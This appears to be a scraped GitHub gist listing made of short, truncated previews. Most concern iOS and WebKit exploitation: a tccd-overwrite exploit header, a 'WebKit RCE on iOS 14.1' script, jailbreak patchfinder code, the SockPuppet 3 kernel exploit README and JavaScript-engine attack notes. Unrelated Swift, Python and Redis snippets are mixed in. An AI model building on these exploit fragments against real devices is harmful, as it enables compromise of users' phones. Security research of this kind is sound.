@import Darwin;
@import Foundation;
@import MachO;
#import <mach-o/fixup-chains.h>
// you'll need helpers.m from Ian Beer's write_no_write and vm_unaligned_copy_switch_race.m from
// WDBFontOverwrite
// Also, set an NSAppleMusicUsageDescription in Info.plist (can be anything)
// Please don't call this code on iOS 14 or below
// (This temporarily overwrites tccd, and on iOS 14 and above changes do not revert on reboot)
@LinusHenze
LinusHenze / iOS_16_Launch_Constraints.txt
Created June 15, 2022 16:30
Description of the Launch Constraints introduced in iOS 16
iOS 16 introduced launch constraints, which can be used to constrain the launch of an application.
There are three types of constraints:
Self Constraints, which the launched application itself must meet
Parent Constraints, which the parent process must meet
Responsible Constraints, which the "responsible process" must meet (I assume that the responsible process is the process that asked launchd to launch a service)
Additionally, the TrustCache format was updated (see below) to support assigning each binary a "Constraint Category", which forces Self and Parent Constraints.
Note that Self, Parent and Responsible Constraints can also be set by the process performing the launch and they can be included in the code signature, in the new blob type 0xFADE8181. In both cases, the constraints are DER encoded (just like the DER entitlements).
Constraint Categories (from TrustCache, new in version 2):
@ujin5
ujin5 / fuck.js
Last active May 13, 2024 10:20
WebKit RCE on iOS 14.1
function sleep( sleepDuration ){
var now = new Date().getTime();
while(new Date().getTime() < now + sleepDuration){ /* do nothing */ }
}
function gc() {
for (let i = 0; i < 0x10; i++) {
new ArrayBuffer(0x1000000);
}
}
let data_view = new DataView(new ArrayBuffer(8));
@coolstar
coolstar / patchfinder64.c
Created July 7, 2020 22:21
patchfinder64 from Odyssey
//
// patchfinder64.c
// extra_recipe
//
// Created by xerub on 06/06/2017.
// Copyright © 2017 xerub. All rights reserved.
//
#include <assert.h>
#include <stdint.h>
@saelo
saelo / 3_years_of_attacking_javascript_engines.txt
Created October 27, 2019 16:04
3 Years of Attacking JavaScript Engines
|=-----------------------------------------------------------------------=|
|=-------------=[ 3 Years of Attacking JavaScript Engines ]=-------------=|
|=-----------------------------------------------------------------------=|
|=------------------------------=[ saelo ]=------------------------------=|
|=-----------------------------------------------------------------------=|
The following are some brief notes about the changes that have taken place
since the release of the "Attacking JavaScript Engines" paper [1]. In
general, no big conceptional changes have happened since. Mitigations have
been added to break some of the presented techniques and, as expected, a
@ur0
ur0 / README.md
Last active June 13, 2024 00:24
SockPuppet 3

SockPuppet 3

This is a kernel exploit targeting iOS 12.0-12.2 and 12.4. It exploits a dangling kernel pointer to craft a fake task port corresponding to the kernel task and gets a send right to it.

This code is not readily compilable — some common sense is a prerequisite. If you do get it going though, it is extremely reliable on any device with more than a gigabyte of RAM. Interested readers may want to investigate how reallocations can be prevented -- this might improve reliability even more.

License

@jakeajames
jakeajames / qwertybug.html
Last active August 17, 2021 01:09
todesco's jsc bug
<pre id="logs"></pre>
<script>
// utilities
let arr = new Uint32Array(2);
let arr64 = new Float64Array(arr.buffer); // use same buffer
function floatToInt(float) {
arr64[0] = float;
import struct
_DELTA = 0x9E3779B9
def _long2str(v, w):
n = (len(v) - 1) << 2
if w:
m = v[-1]
if (m < n - 3) or (m > n): return ''
n = m
@dduan
dduan / runCommand.swift
Last active May 5, 2024 12:55
How to fork()+execv() in Swift
import Foundation
func withCStrings(_ strings: [String], scoped: ([UnsafeMutablePointer<CChar>?]) throws -> Void) rethrows {
let cStrings = strings.map { strdup($0) }
try scoped(cStrings + [nil])
cStrings.forEach { free($0) }
}
enum RunCommandError: Error {
case WaitPIDError
@LeCoupa
LeCoupa / redis_cheatsheet.bash
Last active June 26, 2024 15:54
Redis Cheatsheet - Basic Commands You Must Know --> UPDATED VERSION --> https://github.com/LeCoupa/awesome-cheatsheets
# Redis Cheatsheet
# All the commands you need to know
redis-server /path/redis.conf # start redis with the related configuration file
redis-cli # opens a redis prompt
# Strings.